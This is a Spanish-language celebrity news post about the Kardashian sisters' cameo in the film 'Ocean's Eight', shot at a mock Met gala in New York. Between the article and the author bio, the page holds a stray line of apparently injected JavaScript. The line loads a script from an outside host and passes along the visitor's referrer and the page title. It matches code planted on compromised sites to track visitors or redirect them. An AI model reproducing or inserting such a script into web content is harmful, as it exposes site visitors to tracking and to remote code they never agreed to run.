Las Kardashian saltan a la pantalla grande

Kim, Kendall y Kylie tendrán por fin su sorprendente debut en el cine y en una de las superproducciones previstas para el próximo año.

Se han convertido en estrellas de la televisión, han lanzado líneas de cosméticos, son inspiración y tendencia en la moda. Pero algo que les faltaba por hacer a las hermanas Kardashian era entrar al mundo del cine.

Por fin ese sueño parece cumplirse, Kim, Kendall y Kylie tendrán su sorprendente debut en la pantalla grande, en lo que parece ser una de las superproducciones que se vienen para el próximo año.

Se trata de ‘Ocean’s Eight’, la próxima entrega de una serie clásica que dirigirá Gary Ross y estará producida por George Clooney y Steven Soderbergh, con un reparto colmado de estrellas como Cate Blanchett, Sandra Bullock, Anne Hathaway y Rihanna.

Debutaran en el ‘remake’ femenino de ‘Ocean’s Eleven’, saga de películas de ladrones, que en su momento protagonizaron George Clooney, Brad Pitt y Matt Damon.

El lunes en la noche las hermanas participaron en el rodaje que se realizó en Nueva York en el marco de una ficticia gala del Met, el prestigioso evento del mundo de la moda organizada por Anna Wintour, editora de la revista Vogue.

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado